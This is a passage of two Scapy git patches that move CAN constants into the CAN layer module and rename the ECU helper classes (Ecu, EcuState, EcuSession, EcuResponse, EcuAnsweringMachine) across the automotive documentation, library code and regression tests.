E501 + # Python 3.8 Only if sys.version_info >= (3, 8): from typing import Literal From 399ced1246594f6737df4330624e30cefaf7fed8 Mon Sep 17 00:00:00 2001 From: Nils Weiss Date: Sat, 30 Jan 2021 18:03:50 +0100 Subject: [PATCH 0492/1632] Cleanup constants of CAN --- scapy/contrib/cansocket.py | 4 ++-- scapy/contrib/cansocket_native.py | 9 +++------ scapy/contrib/cansocket_python_can.py | 4 ---- scapy/contrib/isotp.py | 5 +---- scapy/layers/can.py | 15 +++++++++++---- 5 files changed, 17 insertions(+), 20 deletions(-) diff --git a/scapy/contrib/cansocket.py b/scapy/contrib/cansocket.py index 4de13f8f30f..ae86760e1a7 100644 --- a/scapy/contrib/cansocket.py +++ b/scapy/contrib/cansocket.py @@ -33,14 +33,14 @@ log_loading.info("Using python-can CANSocket.") log_loading.info("Specify 'conf.contribs['CANSocket'] = " "{'use-python-can': False}' to enable native CANSockets.") - from scapy.contrib.cansocket_python_can import (PythonCANSocket, CANSocket, CAN_FRAME_SIZE, CAN_INV_FILTER) # noqa: E501 F401 + from scapy.contrib.cansocket_python_can import (PythonCANSocket, CANSocket) # noqa: E501 F401 elif LINUX and six.PY3 and not conf.use_pypy: log_loading.info("Using native CANSocket.") log_loading.info("Specify 'conf.contribs['CANSocket'] = " "{'use-python-can': True}' " "to enable python-can CANSockets.") - from scapy.contrib.cansocket_native import (NativeCANSocket, CANSocket, CAN_FRAME_SIZE, CAN_INV_FILTER) # noqa: E501 F401 + from scapy.contrib.cansocket_native import (NativeCANSocket, CANSocket) # noqa: E501 F401 else: log_loading.info("No CAN support available. Install python-can or " diff --git a/scapy/contrib/cansocket_native.py b/scapy/contrib/cansocket_native.py index 2344e4d821c..704a624c15a 100644 --- a/scapy/contrib/cansocket_native.py +++ b/scapy/contrib/cansocket_native.py @@ -16,15 +16,12 @@ from scapy.config import conf from scapy.supersocket import SuperSocket from scapy.error import Scapy_Exception, warning -from scapy.layers.can import CAN +from scapy.layers.can import CAN, CAN_MTU from scapy.packet import Padding from scapy.arch.linux import get_last_packet_timestamp conf.contribs['NativeCANSocket'] = {'channel': "can0"} -CAN_FRAME_SIZE = 16 -CAN_INV_FILTER = 0x20000000 - class NativeCANSocket(SuperSocket): desc = "read/write packets at a given CAN interface using PF_CAN sockets" @@ -73,7 +70,7 @@ def __init__(self, channel=None, receive_own_messages=False, self.ins.bind((self.channel,)) self.outs = self.ins - def recv(self, x=CAN_FRAME_SIZE): + def recv(self, x=CAN_MTU): try: pkt, sa_ll = self.ins.recvfrom(x) except BlockingIOError: # noqa: F821 @@ -109,7 +106,7 @@ def send(self, x): # required by the underlying Linux SocketCAN frame format bs = bytes(x) if not conf.contribs['CAN']['swap-bytes']: - bs = bs + b'\x00' * (CAN_FRAME_SIZE - len(bs)) + bs = bs + b'\x00' * (CAN_MTU - len(bs)) bs = struct.pack("I12s", bs)) return SuperSocket.send(self, bs) except socket.error as msg: diff --git a/scapy/contrib/cansocket_python_can.py b/scapy/contrib/cansocket_python_can.py index 1d7ce7cde63..a82d526b451 100644 --- a/scapy/contrib/cansocket_python_can.py +++ b/scapy/contrib/cansocket_python_can.py @@ -29,10 +29,6 @@ from can.interface import Bus as can_Bus -CAN_FRAME_SIZE = 16 -CAN_INV_FILTER = 0x20000000 - - class SocketMapper: def __init__(self, bus, sockets): self.bus = bus # type: can_BusABC diff --git a/scapy/contrib/isotp.py b/scapy/contrib/isotp.py index c00b5a5dc3b..084aee6f97c 100644 --- a/scapy/contrib/isotp.py +++ b/scapy/contrib/isotp.py @@ -28,7 +28,7 @@ ThreeBytesField, XBitField, ConditionalField, \ BitEnumField, ByteField, XByteField, BitFieldLenField, StrField from scapy.compat import chb, orb -from scapy.layers.can import CAN +from scapy.layers.can import CAN, CAN_MAX_IDENTIFIER, CAN_MTU, CAN_MAX_DLEN import scapy.modules.six as six import scapy.automaton as automaton from scapy.modules.six.moves import queue @@ -56,9 +56,6 @@ "{'use-can-isotp-kernel-module': True}' to enable " "usage of can-isotp kernel module.") -CAN_MAX_IDENTIFIER = (1 << 29) - 1 # Maximum 29-bit identifier -CAN_MTU = 16 -CAN_MAX_DLEN = 8 ISOTP_MAX_DLEN_2015 = (1 << 32) - 1 # Maximum for 32-bit FF_DL ISOTP_MAX_DLEN = (1 << 12) - 1 # Maximum for 12-bit FF_DL diff --git a/scapy/layers/can.py b/scapy/layers/can.py index 4ff47e1617a..418484c0b87 100644 --- a/scapy/layers/can.py +++ b/scapy/layers/can.py @@ -20,7 +20,7 @@ import scapy.modules.six as six from scapy.config import conf from scapy.compat import orb -from scapy.data import DLT_CAN_SOCKETCAN, MTU +from scapy.data import DLT_CAN_SOCKETCAN from scapy.fields import FieldLenField, FlagsField, StrLenField, \ ThreeBytesField, XBitField, ScalingField, ConditionalField, LenField from scapy.volatile import RandFloat, RandBinFloat @@ -34,7 +34,14 @@ __all__ = ["CAN", "SignalPacket", "SignalField", "LESignedSignalField", "LEUnsignedSignalField", "LEFloatSignalField", "BEFloatSignalField", "BESignedSignalField", "BEUnsignedSignalField", "rdcandump", - "CandumpReader", "SignalHeader"] + "CandumpReader", "SignalHeader", "CAN_MTU", "CAN_MAX_IDENTIFIER", + "CAN_MAX_DLEN", "CAN_INV_FILTER"] + +# CONSTANTS +CAN_MAX_IDENTIFIER = (1 << 29) - 1 # Maximum 29-bit identifier +CAN_MTU = 16 +CAN_MAX_DLEN = 8 +CAN_INV_FILTER = 0x20000000 # Mimics the Wireshark CAN dissector parameter 'Byte-swap the CAN ID/flags field' # noqa: E501 # set to True when working with PF_CAN sockets @@ -419,7 +426,7 @@ def next(self): return pkt __next__ = next - def read_packet(self, size=MTU): + def read_packet(self, size=CAN_MTU): # type: (int) -> Optional[Packet] """return a single packet read from the file or None if filters apply @@ -490,7 +497,7 @@ def read_all(self, count=-1): res.append(p) return PacketList(res, name=os.path.basename(self.filename)) - def recv(self, size=MTU): + def recv(self, size=CAN_MTU): # type: (int) -> Optional[Packet] """ Emulate a socket """ From 75d1776bc8a7629941a0503af4ebe5b7630c92e8 Mon Sep 17 00:00:00 2001 From: Nils Weiss Date: Tue, 2 Feb 2021 00:53:45 +0100 Subject: [PATCH 0493/1632] Ecu style maintenance (#3068) * Rename ECU to Ecu * Rename ECUSession to EcuSession * Rename ECUResponse to EcuResponse * Rename ECU_am to EcuAnsweringMachine * Rename ECUSession to EcuSession * Rename ECUResponse to EcuResponse * Rename ECU_am to EcuAnsweringMachine * Renaming ECU to Ecu * Rename ECU_State to EcuState --- doc/scapy/layers/automotive.rst | 64 +++++----- scapy/contrib/automotive/ecu.py | 73 ++++++------ scapy/contrib/automotive/enumerator.py | 16 +-- test/contrib/automotive/ecu.uts | 54 ++++----- test/contrib/automotive/ecu_am.uts | 98 ++++++++-------- test/contrib/automotive/gm/gmlan.uts | 4 +- test/contrib/automotive/gm/gmlanutils.uts | 2 +- test/contrib/automotive/obd/scanner.uts | 136 +++++++++++----------- test/contrib/automotive/uds.uts | 8 +- test/tools/obdscanner.uts | 46 ++++---- 10 files changed, 251 insertions(+), 250 deletions(-) diff --git a/doc/scapy/layers/automotive.rst b/doc/scapy/layers/automotive.rst index 50682782817..a4a1a08a9a9 100644 --- a/doc/scapy/layers/automotive.rst +++ b/doc/scapy/layers/automotive.rst @@ -408,8 +408,8 @@ CAN Calibration Protocol (CCP) CCP is derived from CAN. The CAN-header is part of a CCP frame. CCP has two types of message objects. One is called Command Receive Object (CRO), the other is called -Data Transmission Object (DTO). Usually CROs are sent to an ECU, and DTOs are received -from an ECU. The information, if one DTO answers a CRO is implemented through a counter +Data Transmission Object (DTO). Usually CROs are sent to an Ecu, and DTOs are received +from an Ecu. The information, if one DTO answers a CRO is implemented through a counter field (ctr). If both objects have the same counter value, the payload of a DTO object can be interpreted from the command of the associated CRO object. @@ -420,14 +420,14 @@ Creating a CRO message:: CCP(identifier=0x711)/CRO(ctr=2)/GET_SEED(resource=2) CCP(identifier=0x711)/CRO(ctr=3)/UNLOCK(key=b"123456") -If we aren't interested in the DTO of an ECU, we can just send a CRO message like this: +If we aren't interested in the DTO of an Ecu, we can just send a CRO message like this: Sending a CRO message:: pkt = CCP(identifier=0x700)/CRO(ctr=1)/CONNECT(station_address=0x02) sock = CANSocket(bustype='socketcan', channel='vcan0') sock.send(pkt) -If we are interested in the DTO of an ECU, we need to set the basecls parameter of the +If we are interested in the DTO of an Ecu, we need to set the basecls parameter of the CANSocket to CCP and we need to use sr1: Sending a CRO message:: @@ -457,10 +457,10 @@ Universal calibration and measurement protocol (XCP) XCP is the successor of CCP. It is usable with several protocols. Scapy includes CAN, UDP and TCP. XCP has two types of message types: Command Transfer Object (CTO) and Data Transmission Object (DTO). -CTOs send to an ECU are requests (commands) and the ECU has to reply with a positive response or an error. -Additionally, the ECU can send a CTO to inform the master about an asynchronous event (EV) or request a service execution (SERV). -DTOs sent by the ECU are called DAQ (Data AcQuisition) and include measured values. -DTOs received by the ECU are used for a periodic stimulation and are called STIM (Stimulation). +CTOs send to an Ecu are requests (commands) and the Ecu has to reply with a positive response or an error. +Additionally, the Ecu can send a CTO to inform the master about an asynchronous event (EV) or request a service execution (SERV). +DTOs sent by the Ecu are called DAQ (Data AcQuisition) and include measured values. +DTOs received by the Ecu are used for a periodic stimulation and are called STIM (Stimulation). Creating a CTO message:: @@ -475,7 +475,7 @@ To send the message over CAN a header has to be added sock = CANSocket(iface=can.interface.Bus(bustype='socketcan', channel='vcan0')) sock.send(pkt) -If we are interested in the response of an ECU, we need to set the basecls parameter of the +If we are interested in the response of an Ecu, we need to set the basecls parameter of the CANSocket to XCPonCAN and we need to use sr1: Sending a CTO message:: @@ -484,7 +484,7 @@ Sending a CTO message:: Since sr1 calls the answers function, our payload of the XCP-response objects gets interpreted with the command of our CTO object. Otherwise it could not be interpreted. -The first message should always be the "CONNECT" message, the response of the ECU determines how the messages are read. E.g.: byte order. +The first message should always be the "CONNECT" message, the response of the Ecu determines how the messages are read. E.g.: byte order. Otherwise, one must set the address granularity, and max size of the DTOs and CTOs per hand in the contrib config:: conf.contribs['XCP']['Address_Granularity_Byte'] = 1 # Can be 1, 2 or 4 @@ -815,15 +815,15 @@ Interactive shell usage example:: >>> scanner = XCPOnCANScanner(sock) >>> result = scanner.start_scan() -The result includes the slave_id (the identifier of the ECU that receives XCP messages), -and the response_id (the identifier that the ECU will send XCP messages to). +The result includes the slave_id (the identifier of the Ecu that receives XCP messages), +and the response_id (the identifier that the Ecu will send XCP messages to). UDS === -The main usage of UDS is flashing and diagnostic of an ECU. UDS is an +The main usage of UDS is flashing and diagnostic of an Ecu. UDS is an application layer protocol and can be used as a DoIP or HSFZ payload or a UDS packet can directly be sent over an ISOTPSocket. Every OEM has its own customization of UDS. This increases the difficulty of generic applications and OEM specific knowledge is @@ -842,9 +842,9 @@ Customization of UDS_RDBI, UDS_WDBI ----------------------------------- In real-world use-cases, the UDS layer is heavily customized. OEMs define their own substructure of packets. -Especially the packets ReadDataByIdentifier or WriteDataByIdentifier have a very OEM or even ECU specific +Especially the packets ReadDataByIdentifier or WriteDataByIdentifier have a very OEM or even Ecu specific substructure. Therefore a ``StrField`` ``dataRecord`` is not added to the ``field_desc``. -The intended usage is to create ECU or OEM specific description files, which extend the general UDS layer of +The intended usage is to create Ecu or OEM specific description files, which extend the general UDS layer of Scapy with further protocol implementations. Customization example:: @@ -913,47 +913,47 @@ Usage example: .. image:: ../graphics/animations/animation-scapy-gmlan.svg -ECU Utility examples +Ecu Utility examples ==================== -The ECU utility can be used to analyze the internal states of an ECU under investigation. +The Ecu utility can be used to analyze the internal states of an Ecu under investigation. This utility depends heavily on the support of the used protocol. ``UDS`` is supported. -Log all commands applied to an ECU +Log all commands applied to an Ecu ---------------------------------- -This example shows the logging mechanism of an ECU object. The log of an ECU is a dictionary of applied UDS commands. The key for this dictionary is the UDS service name. The value consists of a list of tuples, containing a timestamp and a log value +This example shows the logging mechanism of an Ecu object. The log of an Ecu is a dictionary of applied UDS commands. The key for this dictionary is the UDS service name. The value consists of a list of tuples, containing a timestamp and a log value Usage example:: - ecu = ECU(verbose=False, store_supported_responses=False) + ecu = Ecu(verbose=False, store_supported_responses=False) ecu.update(PacketList(msgs)) print(ecu.log) timestamp, value = ecu.log["DiagnosticSessionControl"][0] -Trace all commands applied to an ECU +Trace all commands applied to an Ecu ------------------------------------ -This example shows the trace mechanism of an ECU object. Traces of the current state of the ECU object and the received message are printed on stdout. Some messages, depending on the protocol, will change the internal state of the ECU. +This example shows the trace mechanism of an Ecu object. Traces of the current state of the Ecu object and the received message are printed on stdout. Some messages, depending on the protocol, will change the internal state of the Ecu. Usage example:: - ecu = ECU(verbose=True, logging=False, store_supported_responses=False) + ecu = Ecu(verbose=True, logging=False, store_supported_responses=False) ecu.update(PacketList(msgs)) print(ecu.current_session) -Generate supported responses of an ECU +Generate supported responses of an Ecu -------------------------------------- -This example shows a mechanism to clone a real world ECU by analyzing a list of Packets. +This example shows a mechanism to clone a real world Ecu by analyzing a list of Packets. Usage example:: - ecu = ECU(verbose=False, logging=False, store_supported_responses=True) + ecu = Ecu(verbose=False, logging=False, store_supported_responses=True) ecu.update(PacketList(msgs)) supported_responses = ecu.supported_responses unanswered_packets = ecu.unanswered_packets @@ -973,7 +973,7 @@ Usage example:: udsmsgs = sniff(session=ISOTPSession, session_kwargs={"use_ext_addr":False, "basecls":UDS}, count=50, opened_socket=sock) - ecu = ECU() + ecu = Ecu() ecu.update(udsmsgs) print(ecu.log) print(ecu.supported_responses) @@ -981,14 +981,14 @@ Usage example:: -Analyze on the fly with ECUSession +Analyze on the fly with EcuSession ---------------------------------- -This example shows the usage of an ECUSession in sniff. An ISOTPSocket or any socket like object which returns entire messages of the right protocol can be used. An ``ECUSession`` is used as supersession in an ``ISOTPSession``. To obtain the ``ECU`` object from an ``ECUSession``, the ``ECUSession`` has to be created outside of sniff. +This example shows the usage of an EcuSession in sniff. An ISOTPSocket or any socket like object which returns entire messages of the right protocol can be used. An ``EcuSession`` is used as supersession in an ``ISOTPSession``. To obtain the ``Ecu`` object from an ``EcuSession``, the ``EcuSession`` has to be created outside of sniff. Usage example:: - session = ECUSession() + session = EcuSession() with PcapReader("test/contrib/automotive/ecu_trace.pcap") as sock: udsmsgs = sniff(session=ISOTPSession, session_kwargs={"supersession": session, "use_ext_addr":False, "basecls":UDS}, count=50, opened_socket=sock) @@ -1098,7 +1098,7 @@ OBD OBD message ----------- -OBD is implemented on top of ISOTP. Use an ISOTPSocket for the communication with an ECU. +OBD is implemented on top of ISOTP. Use an ISOTPSocket for the communication with an Ecu. You should set the parameters ``basecls=OBD`` and ``padding=True`` in your ISOTPSocket init call. OBD is split into different service groups. Here are some example requests: @@ -1120,7 +1120,7 @@ The response will contain a PacketListField, called `data_records`. This field c |###[ PID_00_PIDsSupported ]### | supported_pids= PID20+PID1F+PID1C+PID15+PID14+PID13+PID11+PID10+PID0F+PID0E+PID0D+PID0C+PID0B+PID0A+PID07+PID06+PID05+PID04+PID03+PID01 -Let's assume our ECU under test supports the pid 0x15:: +Let's assume our Ecu under test supports the pid 0x15:: req = OBD()/OBD_S01(pid=[0x15]) resp = sock.sr1(req) diff --git a/scapy/contrib/automotive/ecu.py b/scapy/contrib/automotive/ecu.py index 2f549d2767c..d71b0b8f67a 100644 --- a/scapy/contrib/automotive/ecu.py +++ b/scapy/contrib/automotive/ecu.py @@ -5,7 +5,7 @@ # Copyright (C) Nils Weiss # This program is published under a GPLv2 license -# scapy.contrib.description = Helper class for tracking ECU states (ECU) +# scapy.contrib.description = Helper class for tracking Ecu states (Ecu) # scapy.contrib.status = loads import time @@ -20,10 +20,11 @@ from scapy.ansmachine import AnsweringMachine from scapy.config import conf -__all__ = ["ECU_State", "ECU", "ECUResponse", "ECUSession", "ECU_am"] +__all__ = ["EcuState", "Ecu", "EcuResponse", "EcuSession", + "EcuAnsweringMachine"] -class ECU_State(object): +class EcuState(object): def __init__(self, session=1, tester_present=False, security_level=0, communication_control=0, **kwargs): self.session = session @@ -66,7 +67,7 @@ def __repr__(self): return "%d%s%s%s" % (self.session, tps, sl, ks) -class ECU(object): +class Ecu(object): """A ECU object can be used to - track the states of an ECU. - to log all modification to an ECU @@ -74,18 +75,18 @@ class ECU(object): Usage: >>> print("This ecu logs, tracks and creates supported responses") - >>> my_virtual_ecu = ECU() + >>> my_virtual_ecu = Ecu() >>> my_virtual_ecu.update(PacketList([...])) >>> my_virtual_ecu.supported_responses >>> print("Another ecu just tracks") - >>> my_tracking_ecu = ECU(logging=False, store_supported_responses=False) # noqa: E501 + >>> my_tracking_ecu = Ecu(logging=False, store_supported_responses=False) # noqa: E501 >>> my_tracking_ecu.update(PacketList([...])) >>> print("Another ecu just logs all modifications to it") - >>> my_logging_ecu = ECU(verbose=False, store_supported_responses=False) # noqa: E501 + >>> my_logging_ecu = Ecu(verbose=False, store_supported_responses=False) # noqa: E501 >>> my_logging_ecu.update(PacketList([...])) >>> my_logging_ecu.log >>> print("Another ecu just creates supported responses") - >>> my_response_ecu = ECU(verbose=False, logging=False) + >>> my_response_ecu = Ecu(verbose=False, logging=False) >>> my_response_ecu.update(PacketList([...])) >>> my_response_ecu.supported_responses """ @@ -93,7 +94,7 @@ def __init__(self, init_session=None, init_security_level=None, init_communication_control=None, logging=True, verbose=True, store_supported_responses=True): """ - Initialize an ECU object + Initialize an Ecu object :param init_session: An initial session :param init_security_level: An initial security level @@ -104,7 +105,7 @@ def __init__(self, init_session=None, init_security_level=None, :param store_supported_responses: Turn creation of supported responses on or off. Default is on. """ - self.state = ECU_State( + self.state = EcuState( session=init_session or 1, security_level=init_security_level or 0, communication_control=init_communication_control or 0) self.verbose = verbose @@ -174,7 +175,7 @@ def _update_supported_responses(self, pkt): self._unanswered_packets += PacketList([pkt]) answered, unanswered = self._unanswered_packets.sr() for _, resp in answered: - ecu_resp = ECUResponse(session=self.current_session, + ecu_resp = EcuResponse(session=self.current_session, security_level=self.current_security_level, responses=resp) @@ -209,16 +210,16 @@ def __repr__(self): self.communication_control) -class ECUSession(DefaultSession): - """Tracks modification to an ECU 'on-the-flow'. +class EcuSession(DefaultSession): + """Tracks modification to an Ecu 'on-the-flow'. Usage: - >>> sniff(session=ECUSession) + >>> sniff(session=EcuSession) """ def __init__(self, *args, **kwargs): DefaultSession.__init__(self, *args, **kwargs) - self.ecu = ECU(init_session=kwargs.pop("init_session", None), + self.ecu = Ecu(init_session=kwargs.pop("init_session", None), init_security_level=kwargs.pop("init_security_level", None), # noqa: E501 init_communication_control=kwargs.pop("init_communication_control", None), # noqa: E501 logging=kwargs.pop("logging", True), @@ -230,30 +231,30 @@ def on_packet_received(self, pkt): return if isinstance(pkt, list): for p in pkt: - ECUSession.on_packet_received(self, p) + EcuSession.on_packet_received(self, p) return self.ecu.update(pkt) DefaultSession.on_packet_received(self, pkt) -class ECUResponse: - """Encapsulates a response and the according ECU state. - A list of this objects can be used to configure a ECU Answering Machine. - This is useful, if you want to clone the behaviour of a real ECU on a bus. +class EcuResponse: + """Encapsulates a response and the according Ecu state. + A list of this objects can be used to configure a Ecu Answering Machine. + This is useful, if you want to clone the behaviour of a real Ecu on a bus. Usage: - >>> print("Generates a ECUResponse which answers on UDS()/UDS_RDBI(identifiers=[2]) if ECU is in session 2 and has security_level 2") # noqa: E501 - >>> ECUResponse(session=2, security_level=2, responses=UDS()/UDS_RDBIPR(dataIdentifier=2)/Raw(b"deadbeef1")) # noqa: E501 + >>> print("Generates a EcuResponse which answers on UDS()/UDS_RDBI(identifiers=[2]) if Ecu is in session 2 and has security_level 2") # noqa: E501 + >>> EcuResponse(session=2, security_level=2, responses=UDS()/UDS_RDBIPR(dataIdentifier=2)/Raw(b"deadbeef1")) # noqa: E501 >>> print("Further examples") - >>> ECUResponse(session=range(3,5), security_level=[3,4], responses=UDS()/UDS_RDBIPR(dataIdentifier=3)/Raw(b"deadbeef2")) # noqa: E501 - >>> ECUResponse(session=[5,6,7], security_level=range(5,7), responses=UDS()/UDS_RDBIPR(dataIdentifier=5)/Raw(b"deadbeef3")) # noqa: E501 - >>> ECUResponse(session=lambda x: 8 < x <= 10, security_level=lambda x: x > 10, responses=UDS()/UDS_RDBIPR(dataIdentifier=9)/Raw(b"deadbeef4")) # noqa: E501 + >>> EcuResponse(session=range(3,5), security_level=[3,4], responses=UDS()/UDS_RDBIPR(dataIdentifier=3)/Raw(b"deadbeef2")) # noqa: E501 + >>> EcuResponse(session=[5,6,7], security_level=range(5,7), responses=UDS()/UDS_RDBIPR(dataIdentifier=5)/Raw(b"deadbeef3")) # noqa: E501 + >>> EcuResponse(session=lambda x: 8 < x <= 10, security_level=lambda x: x > 10, responses=UDS()/UDS_RDBIPR(dataIdentifier=9)/Raw(b"deadbeef4")) # noqa: E501 """ def __init__(self, session=1, security_level=0, responses=Raw(b"\x7f\x10"), answers=None): """ - Initialize an ECUResponse capsule + Initialize an EcuResponse capsule :param session: Defines the session in which this response is valid. A integer, a callable or any iterable object can be @@ -328,11 +329,11 @@ def __ne__(self, other): __hash__ = None -conf.contribs['ECU_am'] = {'send_delay': 0} +conf.contribs['EcuAnsweringMachine'] = {'send_delay': 0} -class ECU_am(AnsweringMachine): - """AnsweringMachine which emulates the basic behaviour of a real world ECU. +class EcuAnsweringMachine(AnsweringMachine): + """AnsweringMachine which emulates the basic behaviour of a real world Ecu. Provide a list of ``ECUResponse`` objects to configure the behaviour of this AnsweringMachine. @@ -347,13 +348,13 @@ class ECU_am(AnsweringMachine): :param basecls: Provide a basecls of the used protocol Usage: - >>> resp = ECUResponse(session=range(0,255), security_level=0, responses=UDS() / UDS_NR(negativeResponseCode=0x7f, requestServiceId=0x10)) # noqa: E501 + >>> resp = EcuResponse(session=range(0,255), security_level=0, responses=UDS() / UDS_NR(negativeResponseCode=0x7f, requestServiceId=0x10)) # noqa: E501 >>> sock = ISOTPSocket(can_iface, sid=0x700, did=0x600, basecls=UDS) # noqa: E501 - >>> answering_machine = ECU_am(supported_responses=[resp], main_socket=sock, basecls=UDS) # noqa: E501 + >>> answering_machine = EcuAnsweringMachine(supported_responses=[resp], main_socket=sock, basecls=UDS) # noqa: E501 >>> sim = threading.Thread(target=answering_machine, kwargs={'count': 4, 'timeout':5}) # noqa: E501 >>> sim.start() """ - function_name = "ECU_am" + function_name = "EcuAnsweringMachine" sniff_options_list = ["store", "opened_socket", "count", "filter", "prn", "stop_filter", "timeout"] # noqa: E501 def parse_options(self, supported_responses=None, @@ -365,7 +366,7 @@ def parse_options(self, supported_responses=None, if broadcast_socket is not None: self.sockets.append(broadcast_socket) - self.ecu_state = ECU(logging=False, verbose=False, + self.ecu_state = Ecu(logging=False, verbose=False, store_supported_responses=False) self.basecls = basecls self.supported_responses = supported_responses @@ -382,9 +383,9 @@ def print_reply(self, req, reply): def make_reply(self, req): if self.supported_responses is not None: for resp in self.supported_responses: - if not isinstance(resp, ECUResponse): + if not isinstance(resp, EcuResponse): raise Scapy_Exception("Unsupported type for response. " - "Please use `ECUResponse` objects. ") + "Please use `EcuResponse` objects. ") if not resp.in_correct_session(self.ecu_state.current_session): continue @@ -407,7 +408,7 @@ def make_reply(self, req): def send_reply(self, reply): for p in reply: - time.sleep(conf.contribs['ECU_am']['send_delay']) + time.sleep(conf.contribs['EcuAnsweringMachine']['send_delay']) if len(reply) > 1: time.sleep(random.uniform(0.01, 0.5)) self.main_socket.send(p) diff --git a/scapy/contrib/automotive/enumerator.py b/scapy/contrib/automotive/enumerator.py index 14a9382fa79..d9336413b5e 100644 --- a/scapy/contrib/automotive/enumerator.py +++ b/scapy/contrib/automotive/enumerator.py @@ -11,7 +11,7 @@ from scapy.error import Scapy_Exception, log_interactive, warning from scapy.utils import make_lined_table, SingleConversationSocket import scapy.modules.six as six -from scapy.contrib.automotive.ecu import ECU_State +from scapy.contrib.automotive.ecu import EcuState class Graph: @@ -283,7 +283,7 @@ def __init__(self, socket, reset_handler=None, enumerators=None, **kwargs): else: self.socket = socket self.tps = None # TesterPresentSender - self.target_state = ECU_State() + self.target_state = EcuState() self.reset_handler = reset_handler self.verbose = kwargs.get("verbose", False) if enumerators: @@ -293,7 +293,7 @@ def __init__(self, socket, reset_handler=None, enumerators=None, **kwargs): self.enumerators = [e(self.socket) for e in self.default_enumerator_clss] # noqa: E501 self.enumerator_classes = [e.__class__ for e in self.enumerators] self.state_graph = Graph() - self.state_graph.add_edge(ECU_State(), ECU_State()) + self.state_graph.add_edge(EcuState(), EcuState()) self.configuration = \ {"dynamic_timeout": kwargs.pop("dynamic_timeout", False), "enumerator_classes": self.enumerator_classes, @@ -325,9 +325,9 @@ def dump(self, completed_only=True): "delay_state_change": self.configuration["delay_state_change"]} def get_state_paths(self): - paths = [Graph.dijsktra(self.state_graph, ECU_State(), s) - for s in self.state_graph.nodes if s != ECU_State()] - return sorted([p for p in paths if p is not None] + [[ECU_State()]], + paths = [Graph.dijsktra(self.state_graph, EcuState(), s) + for s in self.state_graph.nodes if s != EcuState()] + return sorted([p for p in paths if p is not None] + [[EcuState()]], key=lambda x: x[-1]) def reset_target(self): @@ -339,7 +339,7 @@ def reset_target(self): except TypeError: self.reset_handler() - self.target_state = ECU_State() + self.target_state = EcuState() def execute_enumerator(self, enumerator): enumerator_kwargs = self.configuration[enumerator.__class__] @@ -375,7 +375,7 @@ def scan(self): self.reset_target() def enter_state_path(self, path): - if path[0] != ECU_State(): + if path[0] != EcuState(): raise Scapy_Exception( "Initial state of path not equal reset state of the target") diff --git a/test/contrib/automotive/ecu.uts b/test/contrib/automotive/ecu.uts index a50acd6645a..7eed2319fac 100644 --- a/test/contrib/automotive/ecu.uts +++ b/test/contrib/automotive/ecu.uts @@ -1,4 +1,4 @@ -% Regression tests for the ECU utility +% Regression tests for the Ecu utility # More information at http://www.secdev.org/projects/UTscapy/ @@ -15,7 +15,7 @@ load_contrib("automotive.gm.gmlan", globals_dict=globals()) load_layer("can", globals_dict=globals()) conf.contribs["CAN"]["swap-bytes"] = True -= Load ECU module += Load Ecu module load_contrib("automotive.ecu", globals_dict=globals()) @@ -23,21 +23,21 @@ load_contrib("automotive.ecu", globals_dict=globals()) = Check default init parameters -ecu = ECU() +ecu = Ecu() assert ecu.current_session == 1 assert ecu.current_security_level == 0 assert ecu.communication_control == 0 = Check init parameters -ecu = ECU(init_session=5, init_security_level=4, init_communication_control=2) +ecu = Ecu(init_session=5, init_security_level=4, init_communication_control=2) assert ecu.current_session == 5 assert ecu.current_security_level == 4 assert ecu.communication_control == 2 = Check reset -ecu = ECU(init_session=5, init_security_level=4, init_communication_control=2) +ecu = Ecu(init_session=5, init_security_level=4, init_communication_control=2) ecu.reset() assert ecu.current_session == 1 assert ecu.current_security_level == 0 @@ -45,10 +45,10 @@ assert ecu.communication_control == 0 + Simple operations -= Log all commands applied to an ECU += Log all commands applied to an Ecu ~ docs -* This example shows the logging mechanism of an ECU object. -* The log of an ECU is a dictionary of applied UDS commands. +* This example shows the logging mechanism of an Ecu object. +* The log of an Ecu is a dictionary of applied UDS commands. * The key for this dictionary the UDS service name. The value consists of a list * of tuples, containing a timestamp and a log value @@ -58,7 +58,7 @@ msgs = [UDS(service=16) / UDS_DSC(diagnosticSessionType=3), # no_docs UDS(service=16) / UDS_DSC(diagnosticSessionType=6), # no_docs UDS(service=16) / UDS_DSC(diagnosticSessionType=2)] # no_docs -ecu = ECU(verbose=False, store_supported_responses=False) +ecu = Ecu(verbose=False, store_supported_responses=False) ecu.update(PacketList(msgs)) print(ecu.log) assert len(ecu.log["DiagnosticSessionControl"]) == 5 # no_docs @@ -68,17 +68,17 @@ assert value == "extendedDiagnosticSession" # no_docs assert ecu.log["DiagnosticSessionControl"][-1][1] == "programmingSession" # no_docs -= Trace all commands applied to an ECU += Trace all commands applied to an Ecu ~ docs -* This example shows the trace mechanism of an ECU object. -* Traces of the current state of the ECU object and the received message are +* This example shows the trace mechanism of an Ecu object. +* Traces of the current state of the Ecu object and the received message are * print on stdout. Some messages, depending on the protocol, will change the -* internal state of the ECU. +* internal state of the Ecu. msgs = [UDS(service=16) / UDS_DSC(diagnosticSessionType=3), # no_docs UDS(service=80) / UDS_DSCPR(diagnosticSessionType=3, sessionParameterRecord=b'\\x002\\x01\\xf4')] # no_docs -ecu = ECU(verbose=True, logging=False, store_supported_responses=False) +ecu = Ecu(verbose=True, logging=False, store_supported_responses=False) ecu.update(PacketList(msgs)) print(ecu.current_session) assert ecu.current_session == 3 # no_docs @@ -86,15 +86,15 @@ assert ecu.current_security_level == 0 # no_docs assert ecu.communication_control == 0 # no_docs -= Generate supported responses of an ECU += Generate supported responses of an Ecu ~ docs -* This example shows a mechanism to clone a real world ECU by analyzing a list of Packets. +* This example shows a mechanism to clone a real world Ecu by analyzing a list of Packets. msgs = [UDS(service=16) / UDS_DSC(diagnosticSessionType=3), # no_docs UDS(service=80) / UDS_DSCPR(diagnosticSessionType=3, sessionParameterRecord=b'\\x002\\x01\\xf4'), # no_docs UDS(service=16) / UDS_DSC(diagnosticSessionType=4)] # no_docs -ecu = ECU(verbose=False, logging=False, store_supported_responses=True) +ecu = Ecu(verbose=False, logging=False, store_supported_responses=True) ecu.update(PacketList(msgs)) supported_responses = ecu.supported_responses unanswered_packets = ecu.unanswered_packets @@ -125,7 +125,7 @@ with PcapReader("test/contrib/automotive/ecu_trace.pcap.gz") as sock: assert len(udsmsgs) == 50 # no_docs -ecu = ECU() +ecu = Ecu() ecu.update(udsmsgs) print(ecu.log) print(ecu.supported_responses) @@ -147,14 +147,14 @@ assert response.responses[0].dataIdentifier == 61786 # no_docs assert len(ecu.log["TransferData"]) == 2 -= Analyze on the fly with ECUSession += Analyze on the fly with EcuSession ~ docs -* This example shows the usage of a 